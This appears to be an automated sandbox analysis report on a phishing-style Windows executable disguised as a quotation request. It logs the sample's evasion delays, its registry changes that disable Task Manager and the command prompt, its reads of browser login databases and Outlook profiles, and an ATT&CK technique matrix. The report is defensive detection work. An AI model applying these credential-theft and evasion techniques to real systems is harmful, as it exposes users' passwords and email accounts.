            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598577Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 597910Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 597348Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 597140Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 597023Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596906Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596742Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596296Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595748Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595421Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595203Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595093Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594984Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594874Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594765Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594656Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594546Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594437Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594082Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 593803Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 593656Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 593546Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 593437Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 593328Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 593218Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeWindow / User API: threadDelayed 3060Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeWindow / User API: threadDelayed 6761Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz829B.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeAPI coverage: 4.0 %
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -35048813740048126s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7908Thread sleep count: 3060 > 30Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -599889s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7908Thread sleep count: 6761 > 30Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -599451s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -598577s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -598250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -597910s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -597348s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -597140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -597023s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -596906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -596742s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -596625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -596515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -596406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -596296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -596187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -595968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -595859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -595748s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -595640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -595531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -595421s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -595312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -595203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -595093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -594984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -594874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -594765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -594656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -594546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -594437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -594082s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -593803s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -593656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -593546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -593437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -593328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe TID: 7904Thread sleep time: -593218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405772
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_0040622D FindFirstFileW,FindClose,5_2_0040622D
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_00402770 FindFirstFileW,5_2_00402770
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_00402770 FindFirstFileW,10_2_00402770
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_00405772
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_0040622D FindFirstFileW,FindClose,10_2_0040622D
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599889Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599451Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598577Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 597910Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 597348Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 597140Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 597023Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596906Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596742Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596296Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595748Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595421Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595203Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 595093Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594984Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594874Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594765Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594656Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594546Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594437Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 594082Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 593803Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 593656Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 593546Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 593437Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 593328Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 593218Jump to behavior
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2536020620.00000000045B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2536020620.0000000004558000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(X[
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeAPI call chain: ExitProcess graph end nodegraph_5-4798
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeAPI call chain: ExitProcess graph end nodegraph_5-4803
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD5B28 LdrInitializeThunk,LdrInitializeThunk,10_2_36DD5B28
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,5_2_00406254
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess created: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeQueries volume information: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_00405F0C GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,5_2_00405F0C
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOATION AND PRICES.exe PID: 7616, type: MEMORYSTR
            Source: Yara matchFile source: 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOATION AND PRICES.exe PID: 7616, type: MEMORYSTR
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOATION AND PRICES.exe PID: 7616, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOATION AND PRICES.exe PID: 7616, type: MEMORYSTR
            Source: Yara matchFile source: 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOATION AND PRICES.exe PID: 7616, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            11
            Process Injection
            11
            Masquerading
            1
            OS Credential Dumping
            211
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            31
            Disable or Modify Tools
            LSASS Memory1
            Process Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
            Virtualization/Sandbox Evasion
            Security Account Manager41
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            System Network Configuration Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials2
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSync215
            System Information Discovery
